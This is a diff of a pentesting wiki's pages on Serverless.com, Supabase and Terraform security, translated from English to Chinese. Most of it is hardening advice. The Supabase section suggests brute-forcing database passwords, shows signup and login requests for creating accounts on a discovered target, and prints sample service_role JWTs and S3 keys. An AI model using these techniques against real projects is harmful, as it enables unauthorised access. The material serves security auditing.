- Type: AWS::DynamoDB::Table
- Properties:
- AttributeDefinitions:
- - AttributeName: primary_key
- AttributeType: S
- BillingMode: PAY_PER_REQUEST
- KeySchema:
- - AttributeName: primary_key
- KeyType: HASH
- TableName: ${self:service}-customerTable-${sls:stage}
+Resources:
+CustomerTable:
+Type: AWS::DynamoDB::Table
+Properties:
+AttributeDefinitions:
+- AttributeName: primary_key
+AttributeType: S
+BillingMode: PAY_PER_REQUEST
+KeySchema:
+- AttributeName: primary_key
+KeyType: HASH
+TableName: ${self:service}-customerTable-${sls:stage}
```
-
{{#endtab }}
{{#endtabs }}
-6. Deploy it running **`serverless deploy`**
- 1. The deployment will be performed via a CloudFormation Stack
- 2. Note that the **lambdas are exposed via API gateway** and not via direct URLs
-7. **Test it**
- 1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed
+6. 部署它运行 **`serverless deploy`**
+1. 部署将通过 CloudFormation Stack 执行
+2. 请注意,**lambdas 通过 API gateway 暴露,而不是通过直接 URL**
+7. **测试它**
+1. 上一步将打印出 **URLs**,您的 API 端点 lambda 函数已部署在这些地址
-## Security Review of Serverless.com
+## Serverless.com 的安全审查
-### **Misconfigured IAM Roles and Permissions**
+### **错误配置的 IAM 角色和权限**
-Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation.
+过于宽松的 IAM 角色可能会授予对云资源的未经授权访问,从而导致数据泄露或资源操控。
-When no permissions are specified for the a Lambda function, a role with permissions only to generate logs will be created, like:
+当没有为 Lambda 函数指定权限时,将创建一个仅具有生成日志权限的角色,如下所示:
-Minimum lambda permissions
-
+最低 lambda 权限
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Action": [
- "logs:CreateLogStream",
- "logs:CreateLogGroup",
- "logs:TagResource"
- ],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
- ],
- "Effect": "Allow"
- },
- {
- "Action": ["logs:PutLogEvents"],
- "Resource": [
- "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
- ],
- "Effect": "Allow"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Action": [
+"logs:CreateLogStream",
+"logs:CreateLogGroup",
+"logs:TagResource"
+],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*"
+],
+"Effect": "Allow"
+},
+{
+"Action": ["logs:PutLogEvents"],
+"Resource": [
+"arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*"
+],
+"Effect": "Allow"
+}
+]
}
```
-
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Principle of Least Privilege:** Assign only necessary permissions to each function.
-
- ```yaml
- provider:
- [...]
- iam:
- role:
- statements:
- - Effect: 'Allow'
- Action:
- - 'dynamodb:PutItem'
- - 'dynamodb:Get*'
- - 'dynamodb:Scan*'
- - 'dynamodb:UpdateItem'
- - 'dynamodb:DeleteItem'
- Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
- ```
-
-- **Use Separate Roles:** Differentiate roles based on function requirements.
-
----
-
-### **Insecure Secrets and Configuration Management**
-
-Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised.
-
-The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**!
-
-> [!CAUTION]
-> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!**
-
-For example, the following example will use SSM to get an environment variable:
+- **最小权限原则:** 仅为每个函数分配必要的权限。
```yaml
provider:
- environment:
- DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
```
-And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**.
+- **使用单独的角色:** 根据函数需求区分角色。
+
+---
+
+### **不安全的秘密和配置管理**
+
+将敏感信息(例如,API 密钥、数据库凭据)直接存储在 **`serverless.yml`** 或代码中,如果存储库被攻破,可能会导致泄露。
+
+在 **`serverless.yml`** 文件中存储环境变量的 **推荐** 方法是使用 `ssm` 或 `s3` 提供者,这允许在部署时从这些来源获取 **环境值** 并 **配置** **lambdas** 的环境变量,**文本中不包含值**!
+
+> [!CAUTION]
+> 因此,任何有权限读取 AWS 中 lambdas 配置的人都将能够 **以明文访问所有这些环境变量!**
+
+例如,以下示例将使用 SSM 获取一个环境变量:
+```yaml
+provider:
+environment:
+DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
+```
+And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **以明文形式添加到lambda环境变量中**。
> [!TIP]
-> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**.
+> 使用serveless.com存储环境变量的推荐方法是**将其存储在AWS秘密中**,并仅在环境变量中存储秘密名称,**lambda代码应收集它**。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.**
-- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data.
-- **Access Controls:** Restrict access to secrets based on roles.
+- **秘密管理器集成:** 使用像**AWS Secrets Manager**这样的服务。
+- **加密变量:** 利用Serverless Framework的加密功能来保护敏感数据。
+- **访问控制:** 根据角色限制对秘密的访问。
---
-### **Vulnerable Code and Dependencies**
+### **脆弱的代码和依赖项**
-Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks.
+过时或不安全的依赖项可能引入漏洞,而不当的输入处理可能导致代码注入攻击。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities.
+- **依赖管理:** 定期更新依赖项并扫描漏洞。
- ```yaml
- plugins:
- - serverless-webpack
- - serverless-plugin-snyk
- ```
+```yaml
+plugins:
+- serverless-webpack
+- serverless-plugin-snyk
+```
-- **Input Validation:** Implement strict validation and sanitization of all inputs.
-- **Code Reviews:** Conduct thorough reviews to identify security flaws.
-- **Static Analysis:** Use tools to detect vulnerabilities in the codebase.
+- **输入验证:** 实施严格的验证和清理所有输入。
+- **代码审查:** 进行彻底的审查以识别安全缺陷。
+- **静态分析:** 使用工具检测代码库中的漏洞。
---
-### **Inadequate Logging and Monitoring**
+### **日志和监控不足**
-Without proper logging and monitoring, malicious activities may go undetected, delaying incident response.
+没有适当的日志记录和监控,恶意活动可能会被忽视,从而延迟事件响应。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**.
+- **集中日志记录:** 使用像**AWS CloudWatch**或**Datadog**这样的服务聚合日志。
- ```yaml
- plugins:
- - serverless-plugin-datadog
- ```
+```yaml
+plugins:
+- serverless-plugin-datadog
+```
-- **Enable Detailed Logging:** Capture essential information without exposing sensitive data.
-- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies.
-- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents.
+- **启用详细日志记录:** 捕获重要信息而不暴露敏感数据。
+- **设置警报:** 配置对可疑活动或异常的警报。
+- **定期监控:** 持续监控日志和指标以发现潜在的安全事件。
---
-### **Insecure API Gateway Configurations**
+### **不安全的API网关配置**
-Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks.
+开放或不当保护的API可能被利用进行未经授权的访问、拒绝服务(DoS)攻击或跨站攻击。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT.
+- **身份验证和授权:** 实施强大的机制,如OAuth、API密钥或JWT。
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- authorizer: aws_iam
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+authorizer: aws_iam
+```
-- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates.
+- **速率限制和节流:** 通过限制请求速率来防止滥用。
- ```yaml
- provider:
- apiGateway:
- throttle:
- burstLimit: 200
- rateLimit: 100
- ```
+```yaml
+provider:
+apiGateway:
+throttle:
+burstLimit: 200
+rateLimit: 100
+```
-- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers.
+- **安全的CORS配置:** 限制允许的来源、方法和头部。
- ```yaml
- functions:
- hello:
- handler: handler.hello
- events:
- - http:
- path: hello
- method: get
- cors:
- origin: https://yourdomain.com
- headers:
- - Content-Type
- ```
+```yaml
+functions:
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+cors:
+origin: https://yourdomain.com
+headers:
+- Content-Type
+```
-- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns.
+- **使用Web应用防火墙(WAF):** 过滤和监控HTTP请求以检测恶意模式。
---
-### **Insufficient Function Isolation**
+### **功能隔离不足**
-Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions.
+共享资源和不充分的隔离可能导致权限提升或函数之间的意外交互。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation.
-- **Resource Partitioning:** Use separate databases or storage buckets for different functions.
-- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation.
+- **隔离功能:** 分配不同的资源和IAM角色以确保独立操作。
+- **资源分区:** 为不同的功能使用单独的数据库或存储桶。
+- **使用VPC:** 在虚拟私有云中部署功能以增强网络隔离。
- ```yaml
- provider:
- vpc:
- securityGroupIds:
- - sg-xxxxxxxx
- subnetIds:
- - subnet-xxxxxx
- ```
+```yaml
+provider:
+vpc:
+securityGroupIds:
+- sg-xxxxxxxx
+subnetIds:
+- subnet-xxxxxx
+```
-- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required.
+- **限制功能权限:** 确保功能不能访问或干扰彼此的资源,除非明确需要。
---
-### **Inadequate Data Protection**
+### **数据保护不足**
-Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering.
+静态或传输中的未加密数据可能会被暴露,导致数据泄露或篡改。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Encrypt Data at Rest:** Utilize cloud service encryption features.
+- **加密静态数据:** 利用云服务的加密功能。
- ```yaml
- resources:
- Resources:
- MyDynamoDBTable:
- Type: AWS::DynamoDB::Table
- Properties:
- SSESpecification:
- SSEEnabled: true
- ```
+```yaml
+resources:
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+SSESpecification:
+SSEEnabled: true
+```
-- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions.
-- **Secure API Communication:** Enforce encryption protocols and validate certificates.
-- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly.
+- **加密传输中的数据:** 对所有数据传输使用HTTPS/TLS。
+- **安全的API通信:** 强制执行加密协议并验证证书。
+- **安全管理加密密钥:** 使用托管密钥服务并定期轮换密钥。
---
-### **Lack of Proper Error Handling**
+### **缺乏适当的错误处理**
-Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes.
+详细的错误消息可能泄露有关基础设施或代码库的敏感信息,而未处理的异常可能导致应用程序崩溃。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Generic Error Messages:** Avoid exposing internal details in error responses.
+- **通用错误消息:** 避免在错误响应中暴露内部细节。
- ```javascript
- javascriptCopy code// Example in Node.js
- exports.hello = async (event) => {
- try {
- // Function logic
- } catch (error) {
- console.error(error);
- return {
- statusCode: 500,
- body: JSON.stringify({ message: 'Internal Server Error' }),
- };
- }
- };
- ```
+```javascript
+javascriptCopy code// Example in Node.js
+exports.hello = async (event) => {
+try {
+// Function logic
+} catch (error) {
+console.error(error);
+return {
+statusCode: 500,
+body: JSON.stringify({ message: 'Internal Server Error' }),
+};
+}
+};
+```
-- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions.
-- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users.
+- **集中错误处理:** 在所有功能中一致地管理和清理错误。
+- **监控和记录错误:** 跟踪和分析内部错误,而不向最终用户暴露细节。
---
-### **Insecure Deployment Practices**
+### **不安全的部署实践**
-Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations.
+暴露的部署配置或对CI/CD管道的未经授权访问可能导致恶意代码部署或配置错误。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits.
-- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data.
-- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies.
-- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices.
+- **安全的CI/CD管道:** 实施严格的访问控制、多因素身份验证(MFA)和定期审计。
+- **安全存储配置:** 确保部署文件不包含硬编码的秘密和敏感数据。
+- **使用基础设施即代码(IaC)安全工具:** 使用像**Checkov**或**Terraform Sentinel**这样的工具来强制执行安全策略。
+- **不可变部署:** 通过采用不可变基础设施实践来防止部署后未经授权的更改。
---
-### **Vulnerabilities in Plugins and Extensions**
+### **插件和扩展中的漏洞**
-Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications.
+使用未经审查或恶意的第三方插件可能会将漏洞引入您的无服务器应用程序。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources.
-- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface.
-- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches.
-- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises.
+- **彻底审查插件:** 在集成之前评估插件的安全性,优先选择来自信誉良好的来源的插件。
+- **限制插件使用:** 仅使用必要的插件以最小化攻击面。
+- **监控插件更新:** 保持插件更新以受益于安全补丁。
+- **隔离插件环境:** 在隔离环境中运行插件以限制潜在的妥协。
---
-### **Exposure of Sensitive Endpoints**
+### **敏感端点的暴露**
-Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations.
+公开可访问的功能或不受限制的API可能被利用进行未经授权的操作。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources.
-- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization.
-- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting.
-- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use.
+- **限制功能访问:** 使用VPC、安全组和防火墙规则限制对受信任来源的访问。
+- **实施强大的身份验证:** 确保所有公开的端点都需要适当的身份验证和授权。
+- **安全使用API网关:** 配置API网关以强制执行安全策略,包括输入验证和速率限制。
+- **禁用未使用的端点:** 定期审查并禁用任何不再使用的端点。
---
-### **Excessive Permissions for Team Members and External Collaborators**
+### **团队成员和外部合作者的权限过大**
-Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats.
+向团队成员和外部合作者授予过多权限可能导致未经授权的访问、数据泄露和资源滥用。在多个个人具有不同级别访问权限的环境中,这种风险会加大,增加攻击面和内部威胁的潜力。
-#### **Mitigation Strategies**
+#### **缓解策略**
-- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks.
+- **最小权限原则:** 确保团队成员和合作者仅拥有执行其任务所需的权限。
---
-### **Access Keys and License Keys Security**
+### **访问密钥和许可证密钥安全**
-**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI.
+**访问密钥**和**许可证密钥**是用于验证和授权与Serverless Framework CLI交互的关键凭据。
-- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI.
-- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`.
+- **许可证密钥:** 它们是用于验证对Serverless Framework版本4的访问的唯一标识符,允许通过CLI登录。
+- **访问密钥:** 允许Serverless Framework CLI与Serverless Framework Dashboard进行身份验证的凭据。当使用`serverless` cli登录时,访问密钥将**生成并存储在笔记本电脑中**。您还可以将其设置为名为`SERVERLESS_ACCESS_KEY`的环境变量。
-#### **Security Risks**
+#### **安全风险**
-1. **Exposure Through Code Repositories:**
- - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access.
-2. **Insecure Storage:**
- - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage.
-3. **Improper Distribution:**
- - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors.
-4. **Lack of Rotation:**
- - Not regularly rotating keys extends the exposure period if keys are compromised.
-5. **Excessive Permissions:**
- - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources.
+1. **通过代码库暴露:**
+- 硬编码或意外提交访问密钥和许可证密钥到版本控制系统可能导致未经授权的访问。
+2. **不安全的存储:**
+- 在环境变量或配置文件中以明文存储密钥而没有适当的加密,增加了泄露的可能性。
+3. **不当分发:**
+- 通过不安全的渠道(例如电子邮件、聊天)共享密钥可能导致被恶意行为者拦截。
+4. **缺乏轮换:**
+- 不定期轮换密钥会延长密钥被泄露的暴露期。
+5. **权限过大:**
+- 拥有广泛权限的密钥可能被利用在多个资源上执行未经授权的操作。
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 6fa6219f8..7e63051f9 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -2,49 +2,48 @@
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+根据他们的 [**登陆页面**](https://supabase.com/): Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、身份验证、即时 API、边缘函数、实时订阅、存储和向量嵌入开始您的项目。
-### Subdomain
+### 子域名
-Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+基本上,当创建一个项目时,用户将收到一个 supabase.co 子域名,如:**`jnanozjdybtpqgcwhdiz.supabase.co`**
-## **Database configuration**
+## **数据库配置**
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`**
+> **可以通过链接 `https://supabase.com/dashboard/project//settings/database` 访问这些数据**
-This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
-The password is a **password the user put** previously.
+这个 **数据库** 将部署在某个 AWS 区域,为了连接到它,可以通过以下方式连接:`postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres`(这是在 us-west-1 创建的)。\
+密码是用户之前设置的 **密码**。
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+因此,由于子域名是已知的,并且它被用作用户名,而 AWS 区域是有限的,可能可以尝试 **暴力破解密码**。
-This section also contains options to:
+本节还包含以下选项:
-- Reset the database password
-- Configure connection pooling
-- Configure SSL: Reject plan-text connections (by default they are enabled)
-- Configure Disk size
-- Apply network restrictions and bans
+- 重置数据库密码
+- 配置连接池
+- 配置 SSL:拒绝明文连接(默认情况下启用)
+- 配置磁盘大小
+- 应用网络限制和禁令
-## API Configuration
+## API 配置
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`**
+> **可以通过链接 `https://supabase.com/dashboard/project//settings/api` 访问这些数据**
-The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+访问您项目中 supabase API 的 URL 将类似于:`https://jnanozjdybtpqgcwhdiz.supabase.co`。
-### anon api keys
+### 匿名 API 密钥
-It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+它还将生成一个 **匿名 API 密钥** (`role: "anon"`),如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用程序需要使用它来联系我们示例中暴露的 API 密钥。
-It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+可以在 [**文档**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server) 中找到联系此 API 的 API REST,但最有趣的端点将是:
-Signup (/auth/v1/signup)
-
+注册 (/auth/v1/signup)
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
@@ -69,13 +68,11 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-Login (/auth/v1/token?grant_type=password)
-
+登录 (/auth/v1/token?grant_type=password)
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+所以,每当你发现一个客户使用 supabase 和他们被授予的子域名时(公司的一个子域名可能有一个 CNAME 指向他们的 supabase 子域名),你可以尝试 **使用 supabase API 创建一个新账户**。
### secret / service_role api keys
-A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+一个秘密 API 密钥也会生成 **`role: "service_role"`**。这个 API 密钥应该是秘密的,因为它能够绕过 **行级安全**。
-The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+API 密钥看起来像这样: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
### JWT Secret
-A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+一个 **JWT Secret** 也会被生成,以便应用程序可以 **创建和签署自定义 JWT 令牌**。
-## Authentication
+## 认证
-### Signups
+### 注册
> [!TIP]
-> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+> 默认情况下,supabase 将允许 **新用户在你的项目中创建账户**,通过使用之前提到的 API 端点。
-However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
-This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+然而,这些新账户默认情况下 **需要验证他们的电子邮件地址** 才能登录账户。可以启用 **“允许匿名登录”** 以允许人们在不验证电子邮件地址的情况下登录。这可能会授予对 **意外数据** 的访问(他们获得角色 `public` 和 `authenticated`)。\
+这是一个非常糟糕的主意,因为 supabase 按活跃用户收费,因此人们可以创建用户并登录,而 supabase 将为这些用户收费:
-### Passwords & sessions
+### 密码和会话
-It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
-It's recommended to **improve the requirements as the default ones are weak**.
+可以指示最小密码长度(默认),要求(默认不要求)并禁止使用泄露的密码。\
+建议 **提高要求,因为默认的要求很弱**。
-- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
-- Bot and Abuse Protection: It's possible to enable Captcha.
+- 用户会话:可以配置用户会话的工作方式(超时,每个用户 1 个会话...)
+- 机器人和滥用保护:可以启用验证码。
-### SMTP Settings
+### SMTP 设置
-It's possible to set an SMTP to send emails.
+可以设置 SMTP 以发送电子邮件。
-### Advanced Settings
+### 高级设置
-- Set expire time to access tokens (3600 by default)
-- Set to detect and revoke potentially compromised refresh tokens and timeout
-- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
-- Max Direct Database Connections: Max number of connections used to auth (10 by default)
-- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+- 设置访问令牌的过期时间(默认 3600)
+- 设置检测和撤销潜在被泄露的刷新令牌和超时
+- MFA:指示每个用户可以同时注册多少个 MFA 因素(默认 10)
+- 最大直接数据库连接:用于身份验证的最大连接数(默认 10)
+- 最大请求持续时间:身份验证请求允许持续的最大时间(默认 10 秒)
-## Storage
+## 存储
> [!TIP]
-> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+> Supabase 允许 **存储文件** 并通过 URL 使其可访问(它使用 S3 存储桶)。
-- Set the upload file size limit (default is 50MB)
-- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
-- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+- 设置上传文件大小限制(默认 50MB)
+- S3 连接通过如下 URL 提供: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+- 可以 **请求 S3 访问密钥**,由 `access key ID`(例如 `a37d96544d82ba90057e0e06131d0a7b`)和 `secret access key`(例如 `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)组成
-## Edge Functions
+## 边缘函数
-It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+也可以在 supabase 中 **存储秘密**,这些秘密将 **通过边缘函数访问**(可以从网页创建和删除,但无法直接访问其值)。
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
index 09b875ff2..35f175627 100644
--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -2,307 +2,277 @@
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-[From the docs:](https://developer.hashicorp.com/terraform/intro)
+[来自文档:](https://developer.hashicorp.com/terraform/intro)
-HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+HashiCorp Terraform 是一个 **基础设施即代码工具**,允许您在可版本化、可重用和可共享的人类可读配置文件中定义 **云和本地资源**。然后,您可以使用一致的工作流程来配置和管理整个生命周期中的所有基础设施。Terraform 可以管理低级组件,如计算、存储和网络资源,以及高级组件,如 DNS 条目和 SaaS 功能。
-#### How does Terraform work?
+#### Terraform 如何工作?
-Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
+Terraform 通过其应用程序编程接口 (APIs) 创建和管理云平台和其他服务上的资源。提供程序使 Terraform 能够与几乎任何具有可访问 API 的平台或服务协同工作。
.png>)
-HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
